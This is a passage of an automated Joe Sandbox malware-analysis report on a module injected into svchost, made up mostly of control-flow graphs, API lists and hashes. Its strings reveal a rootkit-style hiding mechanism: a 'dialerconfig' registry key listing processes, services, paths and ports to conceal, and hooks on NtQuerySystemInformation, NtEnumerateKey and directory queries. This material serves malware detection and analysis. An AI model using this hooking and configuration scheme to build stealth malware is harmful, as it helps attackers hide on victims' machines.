14e41fd2ecc-14e41fd2ed0 431->439 440 14e41fd2e57-14e41fd2e5b 431->440 432->405 432->421 435->397 435->431 436->425 436->431 437->408 437->427 439->397 444 14e41fd2e5d-14e41fd2e61 440->444 445 14e41fd2e63-14e41fd2e7d call 14e41fd85c0 440->445 444->445 448 14e41fd2e80-14e41fd2e83 444->448 445->448 451 14e41fd2ea6-14e41fd2ea9 448->451 452 14e41fd2e85-14e41fd2ea3 call 14e41fd85c0 448->452 451->439 454 14e41fd2eab-14e41fd2ec9 call 14e41fd85c0 451->454 452->451 454->439
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                            • API String ID: 2119608203-3850299575
                                                                                                                            • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                                                            • Instruction ID: effd1d481dd4490a16ad21cf9b2687bc37b8d46439eecc8b1afc957421dada5b
                                                                                                                            • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                                                            • Instruction Fuzzy Hash: DBB16972310A9086FF649FA5D4587E9A3E5FF44B94F485016EE0A937A4DB35CC42C7A0
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3140674995-0
                                                                                                                            • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                            • Instruction ID: 4a8a08b1cb576b9d78726fe8905b333cbd284622d38cdc1c56e494f92cae6b39
                                                                                                                            • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                            • Instruction Fuzzy Hash: 4B316172305B8489EF609F60E8543EDB3A0FB84758F48412ADA4E87BA4EF38C549C720
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1239891234-0
                                                                                                                            • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                            • Instruction ID: 6ff2dff154542a0378403bbbd0c8e4de9d1707aa7ebe8d406dd5d67eefb56c20
                                                                                                                            • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                            • Instruction Fuzzy Hash: 39313136314F8086DB60CF25E8443EEB3A4FB89764F580116EA9E87BA5DF38C556CB10

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                            • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                            • API String ID: 106492572-2879589442
                                                                                                                            • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                                                            • Instruction ID: a2090c4e061c94f1704aee29069009e9ac06c7e615b494ced23eb7a84219142a
                                                                                                                            • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                                                            • Instruction Fuzzy Hash: ED712836318B1486EF10AF61E8886E9A3F5FB84B98F091111DE4E87B39DF38C546C360

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                            • String ID: d
                                                                                                                            • API String ID: 2005889112-2564639436
                                                                                                                            • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                                                            • Instruction ID: 013e14f2c87ef41763d25eff144d490c8d2c3adaa6cff7853b3d531281aa9866
                                                                                                                            • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                                                            • Instruction Fuzzy Hash: D5513036708B8886EB55CF62E5483AAB7E1FB89F95F494124DE4A47768DF3CC046C710

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                                            • API String ID: 4175298099-1975688563
                                                                                                                            • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                                                            • Instruction ID: d2164b162b6ae80d87fccfd4c10993e61a433f491f5e0695c4aef27492673104
                                                                                                                            • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                                                            • Instruction Fuzzy Hash: 60318274704A4AA0FF04EFA9E8597E4E3A1BF54354F8D5013941A97676AF78C24BC3B0

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 209 14e41fa6910-14e41fa6916 210 14e41fa6918-14e41fa691b 209->210 211 14e41fa6951-14e41fa695b 209->211 212 14e41fa691d-14e41fa6920 210->212 213 14e41fa6945-14e41fa6984 call 14e41fa6fc0 210->213 214 14e41fa6a78-14e41fa6a8d 211->214 215 14e41fa6938 __scrt_dllmain_crt_thread_attach 212->215 216 14e41fa6922-14e41fa6925 212->216 232 14e41fa698a-14e41fa699f call 14e41fa6e54 213->232 233 14e41fa6a52 213->233 217 14e41fa6a9c-14e41fa6ab6 call 14e41fa6e54 214->217 218 14e41fa6a8f 214->218 224 14e41fa693d-14e41fa6944 215->224 220 14e41fa6927-14e41fa6930 216->220 221 14e41fa6931-14e41fa6936 call 14e41fa6f04 216->221 230 14e41fa6ab8-14e41fa6aed call 14e41fa6f7c call 14e41fa6e1c call 14e41fa7318 call 14e41fa7130 call 14e41fa7154 call 14e41fa6fac 217->230 231 14e41fa6aef-14e41fa6b20 call 14e41fa7190 217->231 222 14e41fa6a91-14e41fa6a9b 218->222 221->224 230->222 243 14e41fa6b31-14e41fa6b37 231->243 244 14e41fa6b22-14e41fa6b28 231->244 241 14e41fa6a6a-14e41fa6a77 call 14e41fa7190 232->241 242 14e41fa69a5-14e41fa69b6 call 14e41fa6ec4 232->242 237 14e41fa6a54-14e41fa6a69 233->237 241->214 259 14e41fa69b8-14e41fa69dc call 14e41fa72dc call 14e41fa6e0c call 14e41fa6e38 call 14e41faac0c 242->259 260 14e41fa6a07-14e41fa6a11 call 14e41fa7130 242->260 249 14e41fa6b39-14e41fa6b43 243->249 250 14e41fa6b7e-14e41fa6b94 call 14e41fa268c 243->250 244->243 248 14e41fa6b2a-14e41fa6b2c 244->248 255 14e41fa6c1f-14e41fa6c2c 248->255 256 14e41fa6b4f-14e41fa6b5d call 14e41fb5780 249->256 257 14e41fa6b45-14e41fa6b4d 249->257 270 14e41fa6b96-14e41fa6b98 250->270 271 14e41fa6bcc-14e41fa6bce 250->271 262 14e41fa6b63-14e41fa6b78 call 14e41fa6910 256->262 274 14e41fa6c15-14e41fa6c1d 256->274 257->262 259->260 312 14e41fa69de-14e41fa69e5 __scrt_dllmain_after_initialize_c 259->312 260->233 282 14e41fa6a13-14e41fa6a1f call 14e41fa7180 260->282 262->250 262->274 270->271 279 14e41fa6b9a-14e41fa6bbc call 14e41fa268c call 14e41fa6a78 270->279 272 14e41fa6bd0-14e41fa6bd3 271->272 273 14e41fa6bd5-14e41fa6bea call 14e41fa6910 271->273 272->273 272->274 273->274 291 14e41fa6bec-14e41fa6bf6 273->291 274->255 279->271 306 14e41fa6bbe-14e41fa6bc6 call 14e41fb5780 279->306 299 14e41fa6a21-14e41fa6a2b call 14e41fa7098 282->299 300 14e41fa6a45-14e41fa6a50 282->300 296 14e41fa6bf8-14e41fa6bff 291->296 297 14e41fa6c01-14e41fa6c11 call 14e41fb5780 291->297 296->274 297->274 299->300 311 14e41fa6a2d-14e41fa6a3b 299->311 300->237 306->271 311->300 312->260 313 14e41fa69e7-14e41fa6a04 call 14e41faabc8 312->313 313->260
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324776404.0000014E41FA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fa0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                            • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                                                            • API String ID: 190073905-1786718095
                                                                                                                            • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                            • Instruction ID: 3e159b189dba1bc57bfc5d577fc7ac4b56b81dc430d962f8f9d12e70aa5f2c50
                                                                                                                            • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                            • Instruction Fuzzy Hash: 3C81C03170064286FE90AB6694593D9E3D0FF897E0F5C80259A09C7FB6EB3DC8478720

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32 ref: 0000014E41FDCE37
                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,0000014E41FE0A6B,?,?,?,0000014E41FE045C,?,?,?,0000014E41FDC84F), ref: 0000014E41FDCE4C
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000014E41FE0A6B,?,?,?,0000014E41FE045C,?,?,?,0000014E41FDC84F), ref: 0000014E41FDCE6D
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000014E41FE0A6B,?,?,?,0000014E41FE045C,?,?,?,0000014E41FDC84F), ref: 0000014E41FDCE9A
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000014E41FE0A6B,?,?,?,0000014E41FE045C,?,?,?,0000014E41FDC84F), ref: 0000014E41FDCEAB
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000014E41FE0A6B,?,?,?,0000014E41FE045C,?,?,?,0000014E41FDC84F), ref: 0000014E41FDCEBC
                                                                                                                            • SetLastError.KERNEL32 ref: 0000014E41FDCED7
                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000014E41FE0A6B,?,?,?,0000014E41FE045C,?,?,?,0000014E41FDC84F), ref: 0000014E41FDCF0D
                                                                                                                            • FlsSetValue.KERNEL32(?,?,00000001,0000014E41FDECCC,?,?,?,?,0000014E41FDBF9F,?,?,?,?,?,0000014E41FD7AB0), ref: 0000014E41FDCF2C
                                                                                                                              • Part of subcall function 0000014E41FDD6CC: HeapAlloc.KERNEL32 ref: 0000014E41FDD721
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000014E41FE0A6B,?,?,?,0000014E41FE045C,?,?,?,0000014E41FDC84F), ref: 0000014E41FDCF54
                                                                                                                              • Part of subcall function 0000014E41FDD744: HeapFree.KERNEL32 ref: 0000014E41FDD75A
                                                                                                                              • Part of subcall function 0000014E41FDD744: GetLastError.KERNEL32 ref: 0000014E41FDD764
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000014E41FE0A6B,?,?,?,0000014E41FE045C,?,?,?,0000014E41FDC84F), ref: 0000014E41FDCF65
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000014E41FE0A6B,?,?,?,0000014E41FE045C,?,?,?,0000014E41FDC84F), ref: 0000014E41FDCF76
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 570795689-0
                                                                                                                            • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                                                            • Instruction ID: d05d1a81437cdd74f7d820c0fbdd9315d75b8d778be0daec336e8a8adf9e924f
                                                                                                                            • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                                                            • Instruction Fuzzy Hash: 8141E7B034528441FE69A735955D7F9E3C2BF847B0F1C0B28A92BC66F6EE68D5039230

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                                            • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                                                            • API String ID: 2171963597-1373409510
                                                                                                                            • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                                                            • Instruction ID: 7e5f448f2627fb39cf378e58a67f4c7b29978e30c1d81c84a71b5fabbdbaa53a
                                                                                                                            • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                                                            • Instruction Fuzzy Hash: B0213032718B5482FB10CB25E4483A9A7E0FB85BA4F580215DA5A42BB8CF7CC54ACB10

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 467 14e41fa9944-14e41fa99ac call 14e41faa814 470 14e41fa99b2-14e41fa99b5 467->470 471 14e41fa9e13-14e41fa9e1b call 14e41fabb48 467->471 470->471 472 14e41fa99bb-14e41fa99c1 470->472 474 14e41fa99c7-14e41fa99cb 472->474 475 14e41fa9a90-14e41fa9aa2 472->475 474->475 479 14e41fa99d1-14e41fa99dc 474->479 477 14e41fa9aa8-14e41fa9aac 475->477 478 14e41fa9d63-14e41fa9d67 475->478 477->478 482 14e41fa9ab2-14e41fa9abd 477->482 480 14e41fa9d69-14e41fa9d70 478->480 481 14e41fa9da0-14e41fa9daa call 14e41fa8a34 478->481 479->475 483 14e41fa99e2-14e41fa99e7 479->483 480->471 484 14e41fa9d76-14e41fa9d9b call 14e41fa9e1c 480->484 481->471 493 14e41fa9dac-14e41fa9dcb call 14e41fa6d40 481->493 482->478 486 14e41fa9ac3-14e41fa9aca 482->486 483->475 487 14e41fa99ed-14e41fa99f7 call 14e41fa8a34 483->487 484->481 490 14e41fa9ad0-14e41fa9b07 call 14e41fa8e10 486->490 491 14e41fa9c94-14e41fa9ca0 486->491 487->493 501 14e41fa99fd-14e41fa9a28 call 14e41fa8a34 * 2 call 14e41fa9124 487->501 490->491 506 14e41fa9b0d-14e41fa9b15 490->506 491->481 494 14e41fa9ca6-14e41fa9caa 491->494 498 14e41fa9cac-14e41fa9cb8 call 14e41fa90e4 494->498 499 14e41fa9cba-14e41fa9cc2 494->499 498->499 515 14e41fa9cdb-14e41fa9ce3 498->515 499->481 505 14e41fa9cc8-14e41fa9cd5 call 14e41fa8cb4 499->505 535 14e41fa9a48-14e41fa9a52 call 14e41fa8a34 501->535 536 14e41fa9a2a-14e41fa9a2e 501->536 505->481 505->515 507 14e41fa9b19-14e41fa9b4b 506->507 512 14e41fa9c87-14e41fa9c8e 507->512 513 14e41fa9b51-14e41fa9b5c 507->513 512->491 512->507 513->512 516 14e41fa9b62-14e41fa9b7b 513->516 517 14e41fa9ce9-14e41fa9ced 515->517 518 14e41fa9df6-14e41fa9e12 call 14e41fa8a34 * 2 call 14e41fabaa8 515->518 520 14e41fa9b81-14e41fa9bc6 call 14e41fa90f8 * 2 516->520 521 14e41fa9c74-14e41fa9c79 516->521 522 14e41fa9d00 517->522 523 14e41fa9cef-14e41fa9cfe call 14e41fa90e4 517->523 518->471 548 14e41fa9bc8-14e41fa9bee call 14e41fa90f8 call 14e41faa038 520->548 549 14e41fa9c04-14e41fa9c0a 520->549 527 14e41fa9c84 521->527 531 14e41fa9d03-14e41fa9d0d call 14e41faa8ac 522->531 523->531 527->512 531->481 546 14e41fa9d13-14e41fa9d61 call 14e41fa8d44 call 14e41fa8f50 531->546 535->475 552 14e41fa9a54-14e41fa9a74 call 14e41fa8a34 * 2 call 14e41faa8ac 535->552 536->535 540 14e41fa9a30-14e41fa9a3b 536->540 540->535 545 14e41fa9a3d-14e41fa9a42 540->545 545->471 545->535 546->481 568 14e41fa9bf0-14e41fa9c02 548->568 569 14e41fa9c15-14e41fa9c72 call 14e41fa9870 548->569 556 14e41fa9c0c-14e41fa9c10 549->556 557 14e41fa9c7b 549->557 573 14e41fa9a76-14e41fa9a80 call 14e41faa99c 552->573 574 14e41fa9a8b 552->574 556->520 558 14e41fa9c80 557->558 558->527 568->548 568->549 569->558 577 14e41fa9a86-14e41fa9def call 14e41fa86ac call 14e41faa3f4 call 14e41fa88a0 573->577 578 14e41fa9df0-14e41fa9df5 call 14e41fabaa8 573->578 574->475 577->578 578->518
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324776404.0000014E41FA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fa0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                            • String ID: csm$csm$csm
                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                            • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                                                            • Instruction ID: 092061804e2acfd85856a6fbf8df1efce0ac3395992e54896de2f0b233cc8006
                                                                                                                            • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                                                            • Instruction Fuzzy Hash: F5E16A72704B408AEF609BA5D4883DDB7E0FB557D8F5C4125EA8997FA5CB38C092C760

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 588 14e41fda544-14e41fda5ac call 14e41fdb414 591 14e41fdaa13-14e41fdaa1b call 14e41fdc748 588->591 592 14e41fda5b2-14e41fda5b5 588->592 592->591 593 14e41fda5bb-14e41fda5c1 592->593 595 14e41fda5c7-14e41fda5cb 593->595 596 14e41fda690-14e41fda6a2 593->596 595->596 600 14e41fda5d1-14e41fda5dc 595->600 598 14e41fda6a8-14e41fda6ac 596->598 599 14e41fda963-14e41fda967 596->599 598->599 601 14e41fda6b2-14e41fda6bd 598->601 603 14e41fda969-14e41fda970 599->603 604 14e41fda9a0-14e41fda9aa call 14e41fd9634 599->604 600->596 602 14e41fda5e2-14e41fda5e7 600->602 601->599 606 14e41fda6c3-14e41fda6ca 601->606 602->596 607 14e41fda5ed-14e41fda5f7 call 14e41fd9634 602->607 603->591 608 14e41fda976-14e41fda99b call 14e41fdaa1c 603->608 604->591 614 14e41fda9ac-14e41fda9cb call 14e41fd7940 604->614 611 14e41fda894-14e41fda8a0 606->611 612 14e41fda6d0-14e41fda707 call 14e41fd9a10 606->612 607->614 622 14e41fda5fd-14e41fda628 call 14e41fd9634 * 2 call 14e41fd9d24 607->622 608->604 611->604 615 14e41fda8a6-14e41fda8aa 611->615 612->611 626 14e41fda70d-14e41fda715 612->626 619 14e41fda8ba-14e41fda8c2 615->619 620 14e41fda8ac-14e41fda8b8 call 14e41fd9ce4 615->620 619->604 625 14e41fda8c8-14e41fda8d5 call 14e41fd98b4 619->625 620->619 633 14e41fda8db-14e41fda8e3 620->633 656 14e41fda62a-14e41fda62e 622->656 657 14e41fda648-14e41fda652 call 14e41fd9634 622->657 625->604 625->633 630 14e41fda719-14e41fda74b 626->630 635 14e41fda887-14e41fda88e 630->635 636 14e41fda751-14e41fda75c 630->636 637 14e41fda9f6-14e41fdaa12 call 14e41fd9634 * 2 call 14e41fdc6a8 633->637 638 14e41fda8e9-14e41fda8ed 633->638 635->611 635->630 636->635 639 14e41fda762-14e41fda77b 636->639 637->591 641 14e41fda8ef-14e41fda8fe call 14e41fd9ce4 638->641 642 14e41fda900 638->642 643 14e41fda874-14e41fda879 639->643 644 14e41fda781-14e41fda7c6 call 14e41fd9cf8 * 2 639->644 652 14e41fda903-14e41fda90d call 14e41fdb4ac 641->652 642->652 648 14e41fda884 643->648 669 14e41fda7c8-14e41fda7ee call 14e41fd9cf8 call 14e41fdac38 644->669 670 14e41fda804-14e41fda80a 644->670 648->635 652->604 667 14e41fda913-14e41fda961 call 14e41fd9944 call 14e41fd9b50 652->667 656->657 661 14e41fda630-14e41fda63b 656->661 657->596 673 14e41fda654-14e41fda674 call 14e41fd9634 * 2 call 14e41fdb4ac 657->673 661->657 666 14e41fda63d-14e41fda642 661->666 666->591 666->657 667->604 688 14e41fda815-14e41fda872 call 14e41fda470 669->688 689 14e41fda7f0-14e41fda802 669->689 677 14e41fda87b 670->677 678 14e41fda80c-14e41fda810 670->678 694 14e41fda68b 673->694 695 14e41fda676-14e41fda680 call 14e41fdb59c 673->695 679 14e41fda880 677->679 678->644 679->648 688->679 689->669 689->670 694->596 698 14e41fda686-14e41fda9ef call 14e41fd92ac call 14e41fdaff4 call 14e41fd94a0 695->698 699 14e41fda9f0-14e41fda9f5 call 14e41fdc6a8 695->699 698->699 699->637
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                            • String ID: csm$csm$csm
                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                            • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                                                            • Instruction ID: d2352766757894f1e6b2819fe3e7d64d43612c435bf147b291665c758718f4e6
                                                                                                                            • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                                                            • Instruction Fuzzy Hash: 43E16B72704B408AEF60DF6594493EDB7E0FB85B98F180115EE8E97BA9CB34C492C725

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                            • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                                                            • Instruction ID: eccfb42c00e0fcebc11fba8db2cb5dd556603cf0515602b7340d8b3a720e917a
                                                                                                                            • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                                                            • Instruction Fuzzy Hash: A0418032315A5091FF16CB56E808BE9A3D6BF46BA0F5D42299D0FD77A4EE38C4478360

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 739 14e41fd104c-14e41fd10b9 RegQueryInfoKeyW 740 14e41fd11b5-14e41fd11d0 739->740 741 14e41fd10bf-14e41fd10c9 739->741 741->740 742 14e41fd10cf-14e41fd111f RegEnumValueW 741->742 743 14e41fd11a5-14e41fd11af 742->743 744 14e41fd1125-14e41fd112a 742->744 743->740 743->742 744->743 745 14e41fd112c-14e41fd1135 744->745 746 14e41fd1147-14e41fd114c 745->746 747 14e41fd1137 745->747 748 14e41fd1199-14e41fd11a3 746->748 749 14e41fd114e-14e41fd1193 GetProcessHeap call 14e41fe6168 GetProcessHeap HeapFree 746->749 750 14e41fd113b-14e41fd113f 747->750 748->743 749->748 750->743 752 14e41fd1141-14e41fd1145 750->752 752->746 752->750
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                            • String ID: d
                                                                                                                            • API String ID: 3743429067-2564639436
                                                                                                                            • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                            • Instruction ID: dcb51b6df01793caf54422eba4bcf925065baaae7f996ed60d537fcaac24bad6
                                                                                                                            • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                            • Instruction Fuzzy Hash: 4A414233218B84C6EB60CF21E44879EB7E5F789B98F448119DA8A47768DF3CC546CB50
                                                                                                                            APIs
                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,0000014E41FDC7DE,?,?,?,?,?,?,?,?,0000014E41FDCF9D,?,?,00000001), ref: 0000014E41FDD087
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000014E41FDC7DE,?,?,?,?,?,?,?,?,0000014E41FDCF9D,?,?,00000001), ref: 0000014E41FDD0A6
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000014E41FDC7DE,?,?,?,?,?,?,?,?,0000014E41FDCF9D,?,?,00000001), ref: 0000014E41FDD0CE
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000014E41FDC7DE,?,?,?,?,?,?,?,?,0000014E41FDCF9D,?,?,00000001), ref: 0000014E41FDD0DF
